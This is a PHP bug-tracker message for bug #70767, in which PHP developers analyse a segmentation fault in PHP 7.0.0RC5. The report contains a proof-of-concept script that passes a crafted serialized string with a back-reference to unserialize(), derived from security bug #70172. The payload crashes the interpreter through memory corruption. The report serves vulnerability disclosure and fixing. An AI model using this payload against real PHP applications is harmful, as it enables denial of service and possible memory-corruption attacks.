Bug #70767 [Ana]: crash after script execution

From: Date: Fri, 23 Oct 2015 08:49:23 +0000
Subject: Bug #70767 [Ana]: crash after script execution
References: 1  Groups: php.bugs 
Request: Send a blank email to php-bugs+get-196766@lists.php.net to get a copy of this message
Edit report at https://bugs.php.net/bug.php?id=70767&edit=1 ID: 70767 Updated by: laruence@php.net Reported by: liska at avast dot com Summary: crash after script execution Status: Analyzed Type: Bug Package: Reproducible crash Operating System: windows 7 64-bit PHP Version: 7.0.0RC5 Assigned To: laruence Block user comment: N Private report: N New Comment: should be: https://3v4l.org/GcebX Previous Comments: ------------------------------------------------------------------------ [2015-10-23 08:48:24] laruence@php.net maybe the 5.6 behaviors wrongly , https://3v4l.org/new reference to a internal (external) object is not allowed. ------------------------------------------------------------------------ [2015-10-23 01:22:11] ryat@php.net These security patches are not merged yet to master/7.0 http://news.php.net/php.internals/87998 ------------------------------------------------------------------------ [2015-10-22 13:18:56] laruence@php.net confirm this , but I don't see a easy way to fix it. the problem is, we are not using zval ** anymore.. :< ------------------------------------------------------------------------ [2015-10-22 12:01:46] liska at avast dot com Description: ------------ First PoC script from #70172 causes segfault in the middle of the dump. I'm using php-7.0.0RC5-Win32-VC14-x64 thread safe. Test script: --------------- class obj implements Serializable { private $data; public function serialize() { return serialize($this->data); } public function unserialize($data) { $this->data = unserialize($data); $this->data = 1; } } $inner = 'a:0:{}'; $exploit = 'a:2:{i:0;C:3:"obj":' . strlen($inner) . ':{' . $inner . '}i:1;R:3;}'; $data = unserialize($exploit); for ($i = 0; $i < 5; $i++) { $v[$i] = 'hi' . $i; } var_dump($data); Expected result: ---------------- produced by PHP 5.6.14 that contains fix to #70172 array(2) { [0]=> object(obj)#1 (1) { ["data":"obj":private]=> int(1) } [1]=> array(0) { } } Actual result: -------------- array(2) { [0]=> Segmentation fault ------------------------------------------------------------------------ -- Edit this bug report at https://bugs.php.net/bug.php?id=70767&edit=1

« previous php.bugs (#196766) next »